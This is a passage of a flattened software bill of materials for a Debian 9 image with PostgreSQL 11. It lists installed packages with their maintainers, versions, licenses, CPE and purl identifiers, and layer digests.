<debian-xml-sgml-pkgs@lists.alioth.debian.org> libxml2 2.9.4+dfsg1-2.2+deb9u6 cpe:2.3:a:libxml2:libxml2:2.9.4\+dfsg1-2.2\+deb9u6:*:*:*:*:*:*:* pkg:deb/debian/libxml2@2.9.4+dfsg1-2.2+deb9u6?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libxml2/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libxml2:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 2131 Debian XML/SGML Group <debian-xml-sgml-pkgs@lists.alioth.debian.org> libxslt1.1 1.1.29-2.1+deb9u2 cpe:2.3:a:libxslt1.1:libxslt1.1:1.1.29-2.1\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libxslt1.1@1.1.29-2.1+deb9u2?arch=amd64&upstream=libxslt&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libxslt1.1/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libxslt1.1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 481 libxslt Debian Med 
Packaging <debian-med-packaging@lists.alioth.debian.org> libzstd1 1.1.2-1+deb9u1 BSD-3-clause-with-patent-grant Expat Zlib cpe:2.3:a:libzstd1:libzstd1:1.1.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libzstd1@1.1.2-1+deb9u1?arch=amd64&upstream=libzstd&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /usr/share/doc/libzstd1/copyright sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /var/lib/dpkg/info/libzstd1.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 550 libzstd GNU Libc Maintainers <debian-glibc@lists.debian.org> locales 2.24-11+deb9u4 GPL-2.0-only LGPL-2.1-only cpe:2.3:a:locales:locales:2.24-11\+deb9u4:*:*:*:*:*:*:* pkg:deb/debian/locales@2.24-11+deb9u4?arch=all&upstream=glibc&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:5afa113a433cd32056370367d1a936a5e77cc30cca6590c0241acffa33d1ec56 /usr/share/doc/locales/copyright sha256:5afa113a433cd32056370367d1a936a5e77cc30cca6590c0241acffa33d1ec56 /var/lib/dpkg/info/locales.conffiles sha256:5afa113a433cd32056370367d1a936a5e77cc30cca6590c0241acffa33d1ec56 /var/lib/dpkg/info/locales.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 9246 glibc Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org> login 1:4.4-4.1+deb9u1 GPL-2.0-only cpe:2.3:a:login:login:1\:4.4-4.1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/login@1:4.4-4.1+deb9u1?arch=amd64&upstream=shadow&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/login/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/login.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/login.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 
2747 shadow Debian LSB Team <debian-lsb@lists.debian.org> lsb-base 9.20161125 BSD-3-Clause GPL-2.0-only cpe:2.3:a:lsb-base:lsb-base:9.20161125:*:*:*:*:*:*:* pkg:deb/debian/lsb-base@9.20161125?arch=all&upstream=lsb&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:lsb-base:lsb_base:9.20161125:*:*:*:*:*:*:* cpe:2.3:a:lsb_base:lsb-base:9.20161125:*:*:*:*:*:*:* cpe:2.3:a:lsb_base:lsb_base:9.20161125:*:*:*:*:*:*:* cpe:2.3:a:lsb:lsb-base:9.20161125:*:*:*:*:*:*:* cpe:2.3:a:lsb:lsb_base:9.20161125:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/lsb-base/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/lsb-base.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 49 lsb Steve Langasek <vorlon@debian.org> mawk 1.3.3-17+b3 GPL-2.0-only cpe:2.3:a:mawk:mawk:1.3.3-17\+b3:*:*:*:*:*:*:* pkg:deb/debian/mawk@1.3.3-17+b3?arch=amd64&upstream=mawk%401.3.3-17&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/mawk/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/mawk.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 183 mawk 1.3.3-17 Debian util-linux Maintainers <ah-util-linux@debian.org> mount 2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:mount:mount:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/mount@2.29.2-1+deb9u1?arch=amd64&upstream=util-linux&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/mount/copyright 
sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/mount.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 444 util-linux GNU Libc Maintainers <debian-glibc@lists.debian.org> multiarch-support 2.24-11+deb9u4 GPL-2.0-only LGPL-2.1-only cpe:2.3:a:multiarch-support:multiarch-support:2.24-11\+deb9u4:*:*:*:*:*:*:* pkg:deb/debian/multiarch-support@2.24-11+deb9u4?arch=amd64&upstream=glibc&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:multiarch-support:multiarch_support:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:multiarch_support:multiarch-support:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:multiarch_support:multiarch_support:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:multiarch:multiarch-support:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:multiarch:multiarch_support:2.24-11\+deb9u4:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/multiarch-support/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/multiarch-support.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 221 glibc Craig Small <csmall@debian.org> ncurses-base 6.0+20161126-1+deb9u2 cpe:2.3:a:ncurses-base:ncurses-base:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/ncurses-base@6.0+20161126-1+deb9u2?arch=all&upstream=ncurses&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:ncurses-base:ncurses_base:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses_base:ncurses-base:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses_base:ncurses_base:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses:ncurses-base:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses:ncurses_base:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/ncurses-base/copyright 
sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/ncurses-base.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/ncurses-base.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 340 ncurses Craig Small <csmall@debian.org> ncurses-bin 6.0+20161126-1+deb9u2 cpe:2.3:a:ncurses-bin:ncurses-bin:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/ncurses-bin@6.0+20161126-1+deb9u2?arch=amd64&upstream=ncurses&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:ncurses-bin:ncurses_bin:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses_bin:ncurses-bin:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses_bin:ncurses_bin:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses:ncurses-bin:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses:ncurses_bin:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/ncurses-bin/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/ncurses-bin.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 536 ncurses Marco d'Itri <md@linux.it> netbase 5.4 GPL-2.0-only cpe:2.3:a:netbase:netbase:5.4:*:*:*:*:*:*:* pkg:deb/debian/netbase@5.4?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/netbase/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/netbase.conffiles sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/netbase.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 44 Debian OpenSSL Team <pkg-openssl-devel@lists.alioth.debian.org> openssl 1.1.0l-1~deb9u5 
cpe:2.3:a:openssl:openssl:1.1.0l-1\~deb9u5:*:*:*:*:*:*:* pkg:deb/debian/openssl@1.1.0l-1~deb9u5?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/openssl/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/openssl.conffiles sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/openssl.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1315 Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org> passwd 1:4.4-4.1+deb9u1 GPL-2.0-only cpe:2.3:a:passwd:passwd:1\:4.4-4.1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/passwd@1:4.4-4.1+deb9u1?arch=amd64&upstream=shadow&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/passwd/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/passwd.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/passwd.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 2478 shadow Niko Tyni <ntyni@debian.org> perl 5.24.1-3+deb9u7 Artistic Artistic-2.0 BSD-3-Clause BSD-3-clause-GENERIC BSD-3-clause-with-weird-numbering BSD-4-clause-POWERDOG BZIP DONT-CHANGE-THE-GPL Expat GPL-1.0-only GPL-1.0-or-later GPL-2.0-only GPL-2.0-or-later GPL-3+-WITH-BISON-EXCEPTION HSIEH-BSD HSIEH-DERIVATIVE LGPL-2.1-only REGCOMP REGCOMP, RRA-KEEP-THIS-NOTICE S2P SDBM-PUBLIC-DOMAIN TEXT-TABS Unicode Zlib cpe:2.3:a:perl:perl:5.24.1-3\+deb9u7:*:*:*:*:*:*:* pkg:deb/debian/perl@5.24.1-3+deb9u7?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/perl/copyright 
sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/perl.conffiles sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/perl.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 651 Niko Tyni <ntyni@debian.org> perl-base 5.24.1-3+deb9u7 Artistic Artistic-2.0 BSD-3-Clause BSD-3-clause-GENERIC BSD-3-clause-with-weird-numbering BSD-4-clause-POWERDOG BZIP DONT-CHANGE-THE-GPL Expat GPL-1.0-only GPL-1.0-or-later GPL-2.0-only GPL-2.0-or-later GPL-3+-WITH-BISON-EXCEPTION HSIEH-BSD HSIEH-DERIVATIVE LGPL-2.1-only REGCOMP REGCOMP, RRA-KEEP-THIS-NOTICE S2P SDBM-PUBLIC-DOMAIN TEXT-TABS Unicode Zlib cpe:2.3:a:perl-base:perl-base:5.24.1-3\+deb9u7:*:*:*:*:*:*:* pkg:deb/debian/perl-base@5.24.1-3+deb9u7?arch=amd64&upstream=perl&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:perl-base:perl_base:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl_base:perl-base:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl_base:perl_base:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl:perl-base:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl:perl_base:5.24.1-3\+deb9u7:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/perl/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/perl-base.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 7551 perl Niko Tyni <ntyni@debian.org> perl-modules-5.24 5.24.1-3+deb9u7 Artistic Artistic-2.0 BSD-3-Clause BSD-3-clause-GENERIC BSD-3-clause-with-weird-numbering BSD-4-clause-POWERDOG BZIP DONT-CHANGE-THE-GPL Expat GPL-1.0-only GPL-1.0-or-later GPL-2.0-only GPL-2.0-or-later GPL-3+-WITH-BISON-EXCEPTION HSIEH-BSD HSIEH-DERIVATIVE LGPL-2.1-only REGCOMP REGCOMP, RRA-KEEP-THIS-NOTICE S2P SDBM-PUBLIC-DOMAIN TEXT-TABS Unicode Zlib cpe:2.3:a:perl-modules-5.24:perl-modules-5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* 
pkg:deb/debian/perl-modules-5.24@5.24.1-3+deb9u7?arch=all&upstream=perl&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:perl-modules-5.24:perl_modules_5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl_modules_5.24:perl-modules-5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl_modules_5.24:perl_modules_5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl-modules:perl-modules-5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl-modules:perl_modules_5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl_modules:perl-modules-5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl_modules:perl_modules_5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl:perl-modules-5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl:perl_modules_5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/perl-modules-5.24/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/perl-modules-5.24.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 17631 perl Debian PostgreSQL Maintainers <pkg-postgresql-public@lists.alioth.debian.org> pgdg-keyring 2018.2 cpe:2.3:a:pgdg-keyring:pgdg-keyring:2018.2:*:*:*:*:*:*:* pkg:deb/debian/pgdg-keyring@2018.2?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:pgdg-keyring:pgdg_keyring:2018.2:*:*:*:*:*:*:* cpe:2.3:a:pgdg_keyring:pgdg-keyring:2018.2:*:*:*:*:*:*:* cpe:2.3:a:pgdg_keyring:pgdg_keyring:2018.2:*:*:*:*:*:*:* cpe:2.3:a:pgdg:pgdg-keyring:2018.2:*:*:*:*:*:*:* cpe:2.3:a:pgdg:pgdg_keyring:2018.2:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/pgdg-keyring/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/pgdg-keyring.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 22 Debian GnuPG Maintainers 
<pkg-gnupg-maint@lists.alioth.debian.org> pinentry-curses 1.0.0-2 GPL-2.0-only GPL-2.0-or-later LGPL-3.0-only LGPL-3.0-or-later X11 cpe:2.3:a:pinentry-curses:pinentry-curses:1.0.0-2:*:*:*:*:*:*:* pkg:deb/debian/pinentry-curses@1.0.0-2?arch=amd64&upstream=pinentry&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:pinentry-curses:pinentry_curses:1.0.0-2:*:*:*:*:*:*:* cpe:2.3:a:pinentry_curses:pinentry-curses:1.0.0-2:*:*:*:*:*:*:* cpe:2.3:a:pinentry_curses:pinentry_curses:1.0.0-2:*:*:*:*:*:*:* cpe:2.3:a:pinentry:pinentry-curses:1.0.0-2:*:*:*:*:*:*:* cpe:2.3:a:pinentry:pinentry_curses:1.0.0-2:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/pinentry-curses/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/pinentry-curses.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 99 pinentry postgresql 11.15 cpe:2.3:a:postgresql:postgresql:11.15:*:*:*:*:*:*:* pkg:generic/postgresql@11.15 binary-cataloger BinaryMetadata binary sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/lib/postgresql/11/bin/postgres Debian PostgreSQL Maintainers <team+postgresql@tracker.debian.org> postgresql-11 11.15-1.pgdg90+1 Artistic BSD-2-Clause BSD-3-Clause Custom-Unicode Custom-pg_dump Custom-regex GPL-1.0-only PostgreSQL Snowball TCL blf double-metaphone imath nagaysau-ishii rijndael cpe:2.3:a:postgresql-11:postgresql-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* pkg:deb/debian/postgresql-11@11.15-1.pgdg90+1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:postgresql-11:postgresql_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_11:postgresql-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_11:postgresql_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* 
sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/postgresql-11/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/postgresql-11.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 44373 Debian PostgreSQL Maintainers <team+postgresql@tracker.debian.org> postgresql-client-11 11.15-1.pgdg90+1 Artistic BSD-2-Clause BSD-3-Clause Custom-Unicode Custom-pg_dump Custom-regex GPL-1.0-only PostgreSQL Snowball TCL blf double-metaphone imath nagaysau-ishii rijndael cpe:2.3:a:postgresql-client-11:postgresql-client-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* pkg:deb/debian/postgresql-client-11@11.15-1.pgdg90+1?arch=amd64&upstream=postgresql-11&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:postgresql-client-11:postgresql_client_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client_11:postgresql-client-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client_11:postgresql_client_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql-client:postgresql-client-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql-client:postgresql_client_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client:postgresql-client-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client:postgresql_client_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql-client-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql_client_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/postgresql-client-11/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/postgresql-client-11.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 6465 postgresql-11 Debian PostgreSQL Maintainers <team+postgresql@tracker.debian.org> postgresql-client-common 238.pgdg90+1 
GPL-2.0-only GPL-2.0-or-later cpe:2.3:a:postgresql-client-common:postgresql-client-common:238.pgdg90\+1:*:*:*:*:*:*:* pkg:deb/debian/postgresql-client-common@238.pgdg90+1?arch=all&upstream=postgresql-common&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:postgresql-client-common:postgresql_client_common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client_common:postgresql-client-common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client_common:postgresql_client_common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql-client:postgresql-client-common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql-client:postgresql_client_common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client:postgresql-client-common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_client:postgresql_client_common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql-client-common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql_client_common:238.pgdg90\+1:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/postgresql-client-common/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/postgresql-client-common.conffiles sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/postgresql-client-common.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 188 postgresql-common Debian PostgreSQL Maintainers <team+postgresql@tracker.debian.org> postgresql-common 238.pgdg90+1 GPL-2.0-only GPL-2.0-or-later cpe:2.3:a:postgresql-common:postgresql-common:238.pgdg90\+1:*:*:*:*:*:*:* pkg:deb/debian/postgresql-common@238.pgdg90+1?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:postgresql-common:postgresql_common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_common:postgresql-common:238.pgdg90\+1:*:*:*:*:*:*:* 
cpe:2.3:a:postgresql_common:postgresql_common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql-common:238.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql:postgresql_common:238.pgdg90\+1:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/postgresql-common/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/postgresql-common.conffiles sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/postgresql-common.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 691 Matthias Klose <doko@debian.org> readline-common 7.0-3 GFDL GPL-3.0-only cpe:2.3:a:readline-common:readline-common:7.0-3:*:*:*:*:*:*:* pkg:deb/debian/readline-common@7.0-3?arch=all&upstream=readline&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:readline-common:readline_common:7.0-3:*:*:*:*:*:*:* cpe:2.3:a:readline_common:readline-common:7.0-3:*:*:*:*:*:*:* cpe:2.3:a:readline_common:readline_common:7.0-3:*:*:*:*:*:*:* cpe:2.3:a:readline:readline-common:7.0-3:*:*:*:*:*:*:* cpe:2.3:a:readline:readline_common:7.0-3:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/readline-common/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/readline-common.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 89 readline Clint Adams <clint@debian.org> sed 4.4-1 GPL-3.0-only cpe:2.3:a:sed:sed:4.4-1:*:*:*:*:*:*:* pkg:deb/debian/sed@4.4-1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/sed/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/sed.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb 
